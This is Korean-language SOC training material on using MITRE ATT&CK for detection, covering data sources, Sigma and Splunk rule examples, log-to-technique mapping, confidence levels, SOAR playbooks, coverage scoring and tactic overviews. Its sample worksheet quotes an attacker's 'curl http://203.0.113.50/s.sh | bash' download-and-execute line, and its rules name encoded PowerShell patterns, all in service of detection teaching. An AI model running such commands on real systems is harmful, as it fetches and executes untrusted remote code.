Process	Process Creation · Process Termination · Process Metadata · OS API Execution
File	File Creation · File Modification · File Deletion · File Access · File Metadata
Network Traffic	Network Connection Creation · Network Traffic Content · Network Traffic Flow
User Account	User Account Authentication · User Account Creation · User Account Modification
Logon Session	Logon Session Creation · Logon Session Metadata
Windows Registry	Windows Registry Key Creation · Windows Registry Key Modification
Script	Script Execution
DNS	DNS Resolution · Active DNS · Passive DNS

실전 예시: T1059.001 PowerShell

Data Source: Process
Component: Process Creation → powershell.exe 실행 감지
Component: OS API Execution → WMI/COM 오브젝트 호출
Data Source: Script
Component: Script Execution → PowerShell 스크립트 블록 로깅
Data Source: Command
Component: Command Execution → 커맨드 라인 인수 분석

📍 Coverage 체크 질문:
"우리 SIEM에 Process Creation 로그가 들어오는가?
Script Block Logging이 활성화되어 있는가?"
— 이 질문이 Coverage 공백 식별의 출발점

보강 설명 Data Component는 Data Source 안에서 실제로 관찰 가능한 구체적인 항목입니다. Process라는 Data Source 아래에는… 조건·예외·운영 연결까지 보면 실무성이 높아집니다.

Data ComponentProcess CreationNetwork Connection

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
Data Component·예외 조건·출력 필드를 함께 설계

Detection Strategy와 Analytics: 탐지 설계의 두 수준

전략(What to detect) → Analytics(How to detect) 로 구체화하는 과정

PART 2 · 탐지 관점

Detection Strategy (탐지 전략)

방어자 관점의 탐지 설계 아이디어 — ATT&CK Technique 페이지에 기재된 "이런 것을 보면 탐지 가능하다"는 가이드

예: T1059.001 PowerShell
"-Encoded 파라미터, 원격 URL 다운로드, Base64 인코딩 커맨드 라인에 주목하라"

Analytics (탐지 논리)

구체화된 탐지 조건 — 실제 SIEM 쿼리나 Rule로 구현 가능한 수준

# Sigma Rule 예시 (T1059.001) detection: selection: Image|endswith: '\powershell.exe' CommandLine|contains: - '-enc ' - '-encoded' - '-w hidden' condition: selection

📚 MITRE CAR
car.mitre.org — ATT&CK 기반 Analytics 저장소. Technique별 탐지 논리 참조 가능

📐 Sigma Rules
github.com/SigmaHQ — 플랫폼 중립 SIEM 룰 형식. ATT&CK 태그 포함 오픈소스 탐지 룰

🔍 Elastic Detection Rules
ATT&CK 매핑된 상용급 탐지 룰 참조. 실무에서 즉시 활용 가능

보강 설명 Detection Strategy는 방어자 관점에서 특정 Technique를 어떻게 탐지할지의 설계 아이디어입니다. Analytics는 더 구체화된 탐지 논리로, 실제 쿼리나 조건으로 구현할 수 있는… 로그 보유 여부보다 어떤 조건에서 잡히고 어디서 오탐이 나는지까지 함께 보는 것이 실무 품질을 좌우합니다.

Detection StrategyAnalyticsCAR

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
Detection Strategy·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

운영 연결

대시보드·티켓·보고 문장을 같은 ATT&CK 언어로 정렬
Purple Team 또는 재현 로그로 룰을 실제 검증
분기별 ATT&CK 업데이트와 함께 룰을 다시 점검

로그에서 시작하는 ATT&CK 매핑 프로세스

실무는 ATT&CK 표를 보고 로그를 찾는 게 아니라, 로그를 보고 ATT&CK를 찾는 역방향 흐름이다

PART 2 · 탐지 관점

로그/이벤트 관찰

무엇이 실행/접근/전송되었는가? 이상 여부는 baseline과 비교해서 판단한다.

행위(Behavior) 식별

로그에서 구체적인 행위를 추출. "powershell.exe가 -enc 파라미터로 실행되었다"

목적(Purpose) 판단

이 행위의 가능한 목적은? 정상 케이스와 공격 케이스를 모두 고려.

ATT&CK 후보 선택

행위+목적과 가장 잘 맞는 Technique/Tactic 선택. Confidence와 근거 함께 기록.

추가 증거 수집

매핑을 강화할 추가 로그 확인. 미확정 부분은 '추가 수집 필요'로 표기.

# 예시: SSH 실패 후 성공 로그 Jun 10 02:11:21 sshd: Failed password for admin from 203.0.113.50 Jun 10 02:11:22 sshd: Failed password Jun 10 02:11:23 sshd: Failed password Jun 10 02:13:08 sshd: Accepted password for backup from 203.0.113.50

매핑 결과

T1110.001 Password Guessing — 반복 실패
성공 후: T1078 Valid Accounts
Confidence: High
다음 액션: 해당 계정 세션 감사, 이후 명령 확인

보강 설명 실무는 ATT&CK 표를 보고 로그를 찾는 게 아니라, 로그를 보고 ATT&CK를 찾는 역방향 흐름입니다. 처음에는 틀려도 괜찮고, 근거를 투명하게 적는 것이 더 중요합니다. 정의만 외우기보다 왜 필요한지, 어떤 로그·행동과 연결되는지 함께 기억하면 이해가 오래갑니다.

로그 매핑역방향 분석행위 식별

이해 포인트

로그 매핑를 목적·행위·근거 관점으로 다시 정리
대표 예시 하나를 떠올려 실제 로그와 연결하기
비슷한 용어와 헷갈리는 차이를 한 문장으로 정리

현업 연결

실무에서 먼저 볼 로그나 도구를 함께 메모하기
이 개념이 보고·탐지·대응 어디에 쓰이는지 구분
다음 슬라이드와 이어지는 질문을 하나 만들어 보기

복습 질문

왜 필요한지 팀원에게 20초로 설명해 보기
역방향 분석 1개와 묶어 기억하기
오탐 가능성 또는 해석 한계도 함께 적어 두기

매핑 확신도(Confidence)와 증거 품질 모델

좋은 SOC 문서는 자신감이 아니라 근거의 밀도로 신뢰를 얻는다

PART 2 · 탐지 관점

 HIGH Confidence다중 센서 증거가 서로 일치
후속 행위까지 맞아 떨어짐
Sub-technique 수준까지 강하게 지지
대체 설명이 거의 불가능

        예: 다중 실패+성공+해외IP+새벽+후속 명령
      
 MEDIUM Confidence주요 행위는 보이지만 대체 설명 가능
단일 센서 증거
정상 행위와 유사한 패턴 존재
추가 로그 수집으로 확신 강화 가능

        예: PowerShell 실행 — 관리 작업일 수도
      
 LOW Confidence후보 Technique는 있으나 근거 부족
환경 맥락 정보 없음
정상 행위 가능성이 높음
추가 수집 및 조사 필요

        예: 외부IP→80포트 — 스캔인지 불분명
      

보고서에는 '무엇을 봤고, 무엇이 없어서 아직 미확정인지'를 함께 적어야 한다. 투명한 불확실성 표기가 더 신뢰받는 분석이다

보강 설명좋은 SOC 문서는 자신감이 아니라 근거의 밀도로 신뢰를 얻습니다. 로그 근거와 운영 액션까지 한 문장으로 이어 보면 학습 효과가 커집니다.

Confidence High/Medium/Low증거 품질불확실성 표기

설명 확장

Confidence High/Medium/Low를 목적-기술-근거 관점으로 다시 정리하기
증거 품질와 연결되는 대표 로그 또는 예시 1개 추가
앞뒤 단계와 이어지는 공격 체인을 한 줄로 설명

판단 포인트

정상 행위와 의심 행위를 나누는 기준 2개 적기
Confidence를 높일 추가 증거와 확인 순서 메모
즉시 조치와 후속 조치를 분리해서 생각하기

학습 요소

불확실성 표기 관련 ATT&CK ID·로그·대응을 묶어 기억하기
오탐 가능성과 공백 로그를 함께 체크하기
실무 보고 문장으로 바꿔 말해 보기

ATT&CK과 SIEM의 연결

SIEM 룰에 ATT&CK 태그를 붙이면 Coverage 분석과 경영진 보고가 가능해진다

PART 2 · 탐지 관점

SIEM + ATT&CK 통합 모델

SIEM 룰을 특정 Technique 또는 Technique 묶음을 탐지 대상으로 설계
탐지 결과에 ATT&CK 태그 부착 → 대시보드·리포트·Coverage 분석 자동화
같은 기술을 여러 로그 소스로 탐지해 상관 규칙 구성 → 신뢰도 향상
SIEM 알림 발생 시 Technique 기반 대응 플레이북 자동 연계

Raw Logs

→

ATT&CK
Tagged Rule

→

Alert /
Case

→

Coverage
분석

# Splunk 탐지 룰 예시 (ATT&CK 태그) index=winevent EventCode=4625 | stats count by TargetUserName, IpAddress | where count > 10 # ATT&CK 태그 mitre_attack_technique = "T1110" mitre_attack_tactic = "Credential Access"

⚠️ 주의: ATT&CK 태그는 분류 도구이고, 품질은 룰 조건의 정확도에서 나옵니다. 태그를 붙인다고 탐지 품질이 자동으로 높아지지 않습니다.

보강 설명SIEM은 이벤트를 모으는 도구이고, ATT&CK은 그 이벤트를 공격자 행동으로 해석하는 분류 체계입니다. 데이터 원천·오탐 구분·운영 액션까지 연결해야 실무 적용도가 높아집니다.

T1110SIEM 룰ATT&CK 태그

설계 포인트

T1110에 필요한 Data Source를 먼저 정리하기
SIEM 룰를 어떤 조건으로 탐지할지 구체화하기
룰·대시보드·플레이북을 같은 언어로 정렬하기

튜닝 포인트

화이트리스트·시간대·자산 중요도 조건 추가
False Positive와 False Negative를 따로 점검
검증 결과를 Coverage 점수에 반영하기

운영 적용

분기별 ATT&CK 버전 업데이트를 체크리스트화
CTI·Purple Team 결과를 룰 개선 backlog로 연결
티켓 문장까지 동일한 ATT&CK 용어로 통일

ATT&CK과 SOAR의 연결: 자동화 분기 조건

ATT&CK Technique를 SOAR 플레이북의 분기 조건으로 활용하는 설계 패턴

PART 2 · 탐지 관점

 T1110 Brute Force
계정 잠금 (임계값 초과 시)
소스 IP 차단 (Firewall API)
사용자 알림 (이메일/SMS)
추가 로그인 기록 조사 자동 수집
AD 잠금 상태 확인


 T1041 C2 Exfiltration
해당 세션 격리 (EDR 격리 API)
외부 전송 중지 (Firewall 룰)
증거 보존 (메모리/디스크 수집)
법무·IR팀 에스컬레이션 티켓 자동 생성
상위 관리자 알림


 T1190 웹 침투
WAF 긴급 룰 강화 (API 연계)
웹 서버 상태 확인 및 스냅샷
의심 프로세스 목록 수집
웹쉘 시그니처 스캔 트리거
개발팀 알림 (변경 이력 확인)

Technique
Detected

→

Context
Enrichment

→

Containment
Decision

→

Automated
Actions

→

Human
Review

⚠️ 자동화 범위 원칙: 격리·차단은 업무 영향이 크므로, 자산 중요도와 신뢰도(Confidence)를 고려해 Containment 임계값을 설정해야 합니다

보강 설명 SOAR는 ATT&CK 공격 단계를 바탕으로 자동화 우선순위와 플레이북 경로를 설계할 수 있습니다. 자동화 범위를 너무 넓히면 업무 영향이 크므로 Containment 기준을 함께 언급해 주세요. 로그 보유 여부보다 어떤 조건에서 잡히고 어디서 오탐이 나는지까지 함께 보는 것이 실무 품질을 좌우합니다.

T1110SOAR 플레이북T1110 자동화

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
T1110·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

운영 연결

대시보드·티켓·보고 문장을 같은 ATT&CK 언어로 정렬
Purple Team 또는 재현 로그로 룰을 실제 검증
분기별 ATT&CK 업데이트와 함께 룰을 다시 점검

ATT&CK과 Incident Response의 연결

현재 확인된 Tactic에서 다음에 어디를 봐야 하는지 알려주는 IR 체크리스트

PART 2 · 탐지 관점

Initial Access 확인 시 → 다음 조사

Execution과 Persistence 흔적을 추가 수집. 어떤 계정이 사용되었는가? 첫 실행 코드는?

Credential Access 확인 시 → 다음 조사

Lateral Movement와 Collection 가능성을 우선 조사. 탈취된 자격증명이 다른 시스템에 사용되었는가?

Exfiltration 의심 시 → 역추적

Collection / Staging / C2 흔적 역추적. 어떤 데이터가, 어디로, 얼마나 나갔는가?

확인된 Tactic	다음에 반드시 확인할 Tactic
Initial Access	Execution, Persistence, Privilege Escalation
Execution	Defense Evasion, Persistence, Credential Access
Credential Access	Lateral Movement, Privilege Escalation, Collection
Lateral Movement	Collection, Discovery, Exfiltration
Command & Control	Collection, Exfiltration, Impact
Collection	Exfiltration, Impact

💡 IR에서 중요한 것은 현재 보이는 것만 적는 것이 아니라, 아직 숨은 구간을 질문하는 능력이다

보강 설명 IR에서 ATT&CK은 침해 범위를 예측하고 아직 보지 못한 구간을 질문하게 만드는 체크리스트가 됩니다. Credential Access가 보였는데 Lateral 확인을 안 하면 어떤 문제가 생길까?를… 시간 순서·로그 근거·다음 조치를 한 세트로 묶어 보면 공격 흐름이 더 선명하게 보입니다.

Initial AccessCredential AccessLateral Movement

흐름 읽기

이 단계가 이전 행위와 어떻게 이어지는지 시간축으로 연결
Technique 근거 로그와 후속 행동을 한 세트로 보기
공격자 목적과 피해 자산을 한 문장으로 적기

현장 판단

정상 운영과 다른 기준 2~3개를 먼저 정해 두기
계정·프로세스·네트워크 증거를 교차 확인하기
즉시 차단과 후속 조사를 나눠서 생각하기

대응 액션

차단 시점이 어디였는지 다시 짚어 보기
보고 문장에는 영향 범위와 다음 조치를 꼭 포함
재발 방지를 위한 룰·정책 개선점까지 메모

ATT&CK Navigator: 기술 목록을 운영 대시보드로

색과 주석으로 탐지 현황을 시각화하고 팀 간 공감대를 형성하는 도구

PART 2 · 탐지 관점

Navigator 주요 활용

탐지 가능 → 초록, 부분 탐지 → 노랑, 미탐지 → 빨강으로 Coverage 시각화
특정 위협 그룹이 사용한 기술을 레이어로 표현 → 우리 커버 비율 파악
팀별 책임 범위, 로그 보유 여부, Purple Team 결과를 주석으로 관리

레이어 활용 예시

Coverage Layer — 현재 탐지 규칙 보유 현황
Threat Actor Layer — 특정 APT 그룹 기술 매핑
Purple Team Layer — 모의 침투 검증 결과
Priority Layer — 환경별 위험도 기반 우선순위

ATT&CK Navigator — Coverage 레이어 예시

Inital
Access

Execution

Persistence

Priv.Esc.

Def.Eva.

Cred.Acc.

Discovery

T1566✓

T1059✓

T1505△

T1055✓

T1562✗

T1110✓

T1018△

T1078✓

T1047✗

T1547✗

T1078✓

T1027✓

T1003△

T1087✗

■ 탐지 보유(✓) ■ 부분탐지(△) ■ 미탐지(✗)

⚠️ 색만 칠하는 것으로 끝내지 말고, 왜 그 색인지 근거 필드까지 관리해야 합니다

보강 설명 Navigator는 복잡한 매트릭스를 색과 주석으로 시각화해 운영팀 간 공감대를 만듭니다. 색만 칠하는 것으로 끝내지 말고 왜 그 색인지 근거 필드까지 관리해야 한다고 알려 주세요. 로그 보유 여부보다 어떤 조건에서 잡히고 어디서 오탐이 나는지까지 함께 보는 것이 실무 품질을 좌우합니다.

Navigator 레이어Coverage 시각화Threat Actor 레이어

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
Navigator 레이어·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

운영 연결

대시보드·티켓·보고 문장을 같은 ATT&CK 언어로 정렬
Purple Team 또는 재현 로그로 룰을 실제 검증
분기별 ATT&CK 업데이트와 함께 룰을 다시 점검

Coverage 분석의 기본 모델: 성숙도 점수

룰 개수가 아닌 실제 가시성과 검증 상태로 보는 Coverage 품질 평가

PART 2 · 탐지 관점

0
미보유해당 Technique를 감지할 로그도 탐지 룰도 없는 상태
Blind Spot
1
로그만 있음관련 로그는 수집되지만 탐지 룰이 구현되지 않은 상태
Data Only
2
탐지 있으나 미검증탐지 룰은 있지만 실제 공격에서 동작하는지 검증 안 됨
Unvalidated
3
운영 검증 완료탐지 룰이 운영 중이며 Purple Team / 실제 경보로 효과 검증됨
Validated

⚠️ 흔한 함정: "Sysmon과 EDR을 쓰니까 대부분 Covered됩니다" — 로그 보유 ≠ Coverage. 탐지 룰이 실제로 동작하고 의미 있는 신호를 잡는지를 검증해야 진짜 Coverage입니다

✅ Coverage 분석 결과 활용: 신규 로그 수집 계획 · 탐지 룰 개선 백로그 · 플레이북 보완 · Purple Team 우선순위 결정의 입력 데이터

보강 설명Coverage는 룰이 몇 개인가가 아니라 어떤 기술을 어떤 품질로 볼 수 있는가를 따져야 합니다. 정의·대표 Technique·추가 질문을 함께 정리해 두면 복습 효율이 올라갑니다.

Coverage 성숙도0~3 점수Validated Coverage

복습 포인트

Coverage 성숙도 핵심 정의를 한 문장으로 다시 말하기
0~3 점수와 연결되는 대표 로그 또는 사례 1개 떠올리기
다음 슬라이드로 이어지는 질문을 스스로 만들기

암기보다 이해

왜 필요한지와 무엇을 판단하는지 구분하기
용어-목적-근거를 세 칸 표처럼 정리하기
팀원에게 설명해 보며 빈 구간을 찾기

학습 요소

Validated Coverage 관련 ATT&CK ID·로그·조치를 묶어 기억하기
오탐 가능성과 탐지 공백도 함께 적어 두기
실제 현업 사례 1개와 연결해 기억 강화

같은 이벤트, 다른 Technique: 맥락이 해석을 결정한다

단일 로그 = 단일 Technique라는 단순화에서 벗어나는 것이 분석 역량의 출발점

PART 2 · 탐지 관점

 웹 로그인 성공정상 사용자 로그인 → 정상
피싱 메일 클릭 직후 → T1078 Valid Accounts
Brute Force 후 성공 → T1110→T1078
 PowerShell 실행IT 관리 스크립트 실행 → 정상
-Enc 파라미터+Base64 → T1059.001+T1027
IEX+WebClient 다운로드 → T1059.001+T1105
 파일 압축정기 백업 작업 → 정상
민감 파일+대용량 → T1560 Archive
새벽+외부SaaS업로드 → Collection+Exfil

핵심 사고법: 행위(What) + 시간/출처/후속행위(When/Where/After) + 사용자 프로파일(Who) = ATT&CK 해석의 최종 판단. 맥락 없는 매핑은 반쪽짜리 분석이다

보강 설명같은 행위라도 맥락이 달라지면 ATT&CK 해석이 달라집니다. 시간축과 로그 근거를 함께 묶어 설명하면 공격 체인의 맥락이 훨씬 선명해집니다.

T1078T1110맥락 의존

시나리오 확장

T1078가 앞뒤 단계와 어떻게 이어지는지 정리
T1110를 시간축으로 놓고 체인으로 연결하기
공격자 목적과 피해 자산을 한 문장으로 설명

판단 포인트

정상 운영과 다른 기준 2~3개를 명확히 적기
계정·프로세스·네트워크 증거를 함께 교차 보기
차단 시점과 피해 최소화 지점을 구분해 보기

실무 적용

즉시 조치와 후속 조치를 나눠서 제안
보고 문장에는 ATT&CK ID와 영향 범위 포함
재발 방지를 위한 룰·정책 보완점까지 적기

하나의 Technique를 확신하려면 여러 로그가 필요하다

멀티시그널 상관 분석 — 센서가 많아야 확신이 생긴다

PART 2 · 탐지 관점

T1190 웹 침투 — 멀티시그널 확신 과정

①

웹 로그 — 비정상적인 URL 패턴, 오류 응답 급증 → Medium

②

WAF 로그 — SQLi/XSS 패턴 탐지, 차단 이벤트 → Medium+

③

서버 프로세스 — 웹 서버가 비정상 자식 프로세스 생성 → High

④

아웃바운드 통신 — 웹 서버 → 외부 IP → Very High. T1190 확정

T1071 C2 통신 — 멀티시그널

DNS 로그 — DGA 도메인, 고빈도 쿼리
Proxy 로그 — 희귀 User-Agent, 주기적 접속
NetFlow — 장시간 소량 연결 유지
TLS 메타데이터 — 자체 서명 인증서, 이상 JA3
EDR 네트워크 — 프로세스 → 외부 연결 맵

✅ 5개 센서 중 3개 이상 일치 시 High Confidence C2

💡 보고 습관: "EDR 확인(Medium) → 웹 로그 확인(High) → 아웃바운드 통신 확인(Very High)" 처럼 센서별 증거를 순서대로 쌓아서 Confidence를 높이는 방식으로 보고한다

보강 설명정교한 Technique일수록 단일 센서보다 다중 증거를 묶어야 신뢰도 높은 판단이 가능합니다. 로그 근거와 운영 액션까지 한 문장으로 이어 보면 학습 효과가 커집니다.

T1190T1071멀티시그널

설명 확장

T1190를 목적-기술-근거 관점으로 다시 정리하기
T1071와 연결되는 대표 로그 또는 예시 1개 추가
앞뒤 단계와 이어지는 공격 체인을 한 줄로 설명

판단 포인트

정상 행위와 의심 행위를 나누는 기준 2개 적기
Confidence를 높일 추가 증거와 확인 순서 메모
즉시 조치와 후속 조치를 분리해서 생각하기

학습 요소

멀티시그널 관련 ATT&CK ID·로그·대응을 묶어 기억하기
오탐 가능성과 공백 로그를 함께 체크하기
실무 보고 문장으로 바꿔 말해 보기

ATT&CK 매핑 워크시트 작성법

Technique + 근거 + Confidence + 다음 액션을 한 표에 담는 분석 문서 형식

PART 2 · 탐지 관점

타임스탬프	관측 행위	Tactic	Technique ID	근거 로그/이벤트	Confidence	다음 액션
02:11~02:13	SSH 반복 실패 후 성공	Cred.Access → Initial Access	T1110.001 → T1078	sshd Failed(×12) → Accepted, 동일 외부 IP	High	해당 계정 세션 감사, 이후 명령 확인
02:15	curl로 외부 스크립트 다운로드	Execution + C2	T1059.004 + T1105	bash_history: curl http://203.0.113.50/s.sh \| bash	High	URL 차단, 파일 해시 수집, 연결 IP 조사
02:18	crontab 수정 — 매분 백도어 실행	Persistence	T1053.003	/var/spool/cron/root 수정, auditd syscall=rename	High	crontab 즉시 정리, 유사 작업 전체 스캔
02:25	대용량 데이터 외부 전송	Exfiltration	T1041	netflow: 내부서버→외부IP, 850MB 업로드	Medium	전송 내용 파악, DLP 연계, 법무 검토 요청

💡 작성 원칙: ① 관찰 사실 먼저 적기 ② Technique는 가장 가까운 것으로 선택 ③ 근거 로그는 구체적 한 줄로 ④ Confidence Low이면 "추가 수집 필요" 표기 ⑤ 다음 액션은 반드시 구체적 행동으로

보강 설명 실제 분석 업무에서 사용하는 매핑 워크시트 형식을 보여줍니다. Technique ID, 근거 로그, Confidence, 다음 액션을 함께 기록하는 것이 핵심입니다. 정의만 외우기보다 왜 필요한지, 어떤 로그·행동과 연결되는지 함께 기억하면 이해가 오래갑니다.

매핑 워크시트Technique ID근거 로그

이해 포인트

매핑 워크시트를 목적·행위·근거 관점으로 다시 정리
대표 예시 하나를 떠올려 실제 로그와 연결하기
비슷한 용어와 헷갈리는 차이를 한 문장으로 정리

현업 연결

실무에서 먼저 볼 로그나 도구를 함께 메모하기
이 개념이 보고·탐지·대응 어디에 쓰이는지 구분
다음 슬라이드와 이어지는 질문을 하나 만들어 보기

복습 질문

왜 필요한지 팀원에게 20초로 설명해 보기
Technique ID 1개와 묶어 기억하기
오탐 가능성 또는 해석 한계도 함께 적어 두기

D3FEND와 함께 보면 좋은 이유: 공격-방어 짝

ATT&CK이 공격 지도라면, D3FEND는 방어 메커니즘 지도

PART 2 · 탐지 관점

ATT&CK — 공격 행위 분류

공격자가 무엇을 하는가에 집중. Technique와 Sub-technique로 행위를 분류하고 탐지/분석 언어로 활용.

T1555 Credentials from Password Stores
↕ 매핑

D3FEND — 방어 메커니즘 분류

방어자가 무엇을 할 수 있는가에 집중. 탐지·격리·속임·강화 등의 방어 기술 개념을 지식 그래프로 구조화.

D3-CPAM: Credential Policy Administration
D3-OTP: One-time Password (MFA)

Credential Access 예시: ATT&CK → D3FEND 연결

공격 (ATT&CK)

T1110 Brute Force

T1003 OS Credential Dumping

T1555 Credential from Stores

탐지 방어 (D3FEND)

로그인 시도 모니터링

메모리 접근 감사

비밀번호 저장소 접근 탐지

예방 방어 (D3FEND)

MFA · 계정 잠금 정책

PAM · Credential Guard

비밀번호 볼트 · 암호화

보강 설명 ATT&CK이 공격자 행동의 지도라면, D3FEND는 방어자가 어떤 대응 개념을 붙일 수 있는지 생각하게 돕습니다. 탐지 이후 통제와 완화로 사고를 확장하는 감각을 주는 데 유용합니다. 로그 보유 여부보다 어떤 조건에서 잡히고 어디서 오탐이 나는지까지 함께 보는 것이 실무 품질을 좌우합니다.

D3FEND방어 지식그래프MFA PAM

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
D3FEND·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

운영 연결

대시보드·티켓·보고 문장을 같은 ATT&CK 언어로 정렬
Purple Team 또는 재현 로그로 룰을 실제 검증
분기별 ATT&CK 업데이트와 함께 룰을 다시 점검

Part 1~2 핵심 정리 — 빠른 체크

ATT&CK 기본 구조와 탐지 관점 핵심 개념 확인

PART 2 · 정리

개념 구분 퀴즈

"Initial Access"는 Tactic인가 Technique인가?

→ Tactic (TA0001). 목적(왜)을 나타냄

T1566에서 T1566은 무엇인가?

→ Technique ID. 방법(어떻게)을 나타냄

Process Creation은 Data Source? Component?

→ Data Component. Data Source 'Process' 안의 구체적 관찰 항목

Coverage 점수 '1'의 의미는?

→ 로그는 있으나 탐지 룰 미구현. Data Only 상태

핵심 메시지 6개

ATT&CK은 판단을 구조화하는 도구이지 자동 정답표가 아니다
Tactic = 목적(왜) / Technique = 방법(어떻게) / Sub-technique = 세부 형태
Data Source = 카테고리, Data Component = 실제 관찰 항목
매핑은 근거 + Confidence를 함께 기록해야 의미 있다
Coverage는 룰 개수가 아니라 검증된 탐지 품질로 측정
멀티시그널 상관 분석이 단일 센서보다 높은 Confidence를 만든다

다음 단계: Part 3에서 14개 Tactic을 하나씩 들어가며, 각 Tactic의 대표 Technique · 관찰 신호 · 오탐 구분 · 실무 액션을 다룹니다

보강 설명 Part 1~2에서 배운 핵심 내용을 빠르게 확인합니다. 특히 Tactic vs Technique 구분, Data Source vs Data Component 구분이 제대로 됐는지 확인합니다. 로그 보유 여부보다 어떤 조건에서 잡히고 어디서 오탐이 나는지까지 함께 보는 것이 실무 품질을 좌우합니다.

Tactic vs Techniq…Data ComponentConfidence

설계 포인트

필요한 Data Source와 Component를 먼저 확인하기
Tactic vs Technique·예외 조건·출력 필드를 함께 설계
알림이 어떤 플레이북으로 이어질지 같이 적기

튜닝 관점

오탐과 미탐을 따로 나눠 점검하기
시간대·자산 중요도·허용 목록으로 맥락 보강
검증 결과를 Coverage와 backlog에 반영하기

운영 연결

대시보드·티켓·보고 문장을 같은 ATT&CK 언어로 정렬
Purple Team 또는 재현 로그로 룰을 실제 검증
분기별 ATT&CK 업데이트와 함께 룰을 다시 점검

PART 3

Enterprise Tactic별
관찰 포인트와 SOC 질문

14개 Tactic 각각의 목적·대표 Technique·관찰 신호·오탐 요소·실무 액션을 단계별로 파악한다

⏱️ 약 150분 📌 Tactic 14개 심화 📌 관찰 신호 · 오탐 구분 · 다음 질문

Reconnaissance (TA0043) — 사전 정찰

공격 전에 표적 환경을 이해하기 위한 정보 수집 — SOC 가시성이 가장 낮은 구간

PART 3 · Tactic 심화

목적 & 대표 Technique

목적: 표적 조직의 인프라·인원·취약점 파악 — 작전 효율 극대화
T1595 Active Scanning — IP/포트/서비스 스캔, 취약점 스캐닝
T1592 Gather Victim Host Info — OS, 소프트웨어, 펌웨어 정보 수집
T1593 Search Open Websites/Domains — Shodan, OSINT, LinkedIn 검색
T1598 Phishing for Information — 정보 획득 목적 피싱 (악성코드 아님)
T1596 Search Open Technical Databases — WHOIS, DNS, SSL 인증서 조회

관찰 신호

외부에서 반복되는 포트/URL/서비스 스캔 (WAF, Firewall 로그)
DNS·WHOIS·서브도메인 대량 수집 흔적 (Passive DNS, TI)
임직원·조직도·메일 주소 수집 정황 (소셜 미디어, 메일 이상)
외부 Attack Surface Management 도구 흔적

⚠️ 가시성 한계: Reconnaissance 대부분은 내부 로그에 흔적이 없음. WAF 외부 스캔, Passive DNS, External ASM 데이터가 주요 원천

💡 분석 질문: 이 스캔이 정상 모니터링 서비스에서 온 것인가, 아니면 공격자 정찰 도구에서 온 것인가? Source IP 평판과 스캔 패턴(범위, 속도)을 함께 봐야 한다

보강 설명 Reconnaissance는 공격 전에 표적 환경을 이해하기 위한 정보 수집입니다. SOC 가시성이 가장 낮은 구간이므로, 외부 인텔리전스와 수동적 관찰이 중요합니다. 정상 운영과 겹치는 구간이 많으므로 후보를… 정의만 외우기보다 왜 필요한지, 어떤 로그·행동과 연결되는지 함께 기억하면 이해가 오래갑니다.

TA0043T1595T1598

이해 포인트

TA0043를 목적·행위·근거 관점으로 다시 정리
대표 예시 하나를 떠올려 실제 로그와 연결하기
비슷한 용어와 헷갈리는 차이를 한 문장으로 정리

현업 연결

실무에서 먼저 볼 로그나 도구를 함께 메모하기
이 개념이 보고·탐지·대응 어디에 쓰이는지 구분
다음 슬라이드와 이어지는 질문을 하나 만들어 보기

복습 질문

왜 필요한지 팀원에게 20초로 설명해 보기
T1595 1개와 묶어 기억하기
오탐 가능성 또는 해석 한계도 함께 적어 두기

Resource Development (TA0042) — 자원 확보

공격 인프라 구축·탈취 — SOC 직접 관찰 어렵지만 CTI로 사전 경고 가능

PART 3 · Tactic 심화

목적 & 대표 Technique

목적: 공격 실행에 필요한 인프라·계정·역량을 사전에 확보
T1583 Acquire Infrastructure — VPS, 도메인, C2 서버 직접 구매
T1584 Compromise Infrastructure — 제3자 서버·도메인 탈취해 활용
T1585 Establish Accounts — 소셜 미디어·이메일 가짜 계정 생성
T1587 Develop Capabilities — 멀웨어·익스플로잇 직접 개발
T1588 Obtain Capabilities — 다크웹에서 툴킷·취약점 구매

SOC 대응 포인트

도메인 모니터링: 자사 브랜드·도메인 유사 등록 탐지 (타이포스쿼팅)
TI 피드: 공격 그룹의 새 C2 인프라 IOC 구독 및 차단 준비
인증서 투명성(CT Log): 자사 도메인 유사 TLS 인증서 발급 모니터링
DMARC/SPF: 자사 도메인 스푸핑 이메일 차단 강화

📍 실무 예시: "company-secure[.]com" 같은 타이포스쿼팅 도메인이 피싱 메일 발송 2주 전에 등록된 사례 — CT Log 모니터링으로 사전 탐지 가능

보강 설명Resource Development는 공격 인프라를 직접 구축하거나 탈취하는 단계입니다. 로그 근거와 운영 액션까지 한 문장으로 이어 보면 학습 효과가 커집니다.

TA0042T1583Resource Development

설명 확장

TA0042를 목적-기술-근거 관점으로 다시 정리하기
T1583와 연결되는 대표 로그 또는 예시 1개 추가
앞뒤 단계와 이어지는 공격 체인을 한 줄로 설명

판단 포인트

정상 행위와 의심 행위를 나누는 기준 2개 적기
Confidence를 높일 추가 증거와 확인 순서 메모
즉시 조치와 후속 조치를 분리해서 생각하기

학습 요소

Resource Development 관련 ATT&CK ID·로그·대응을 묶어 기억하기
오탐 가능성과 공백 로그를 함께 체크하기
실무 보고 문장으로 바꿔 말해 보기

Initial Access (TA0001) — 초기 침투

내부 네트워크에 첫 발판을 마련하는 모든 경로 — 놓치면 이후 체인 전체가 블라인드

PART 3 · Tactic 심화

대표 Technique

T1566 Phishing — 첨부파일·링크·서비스 채널 피싱 (SOC 최다 탐지)
T1190 Exploit Public-Facing Application — 웹·VPN·메일 서버 취약점 직접 공격
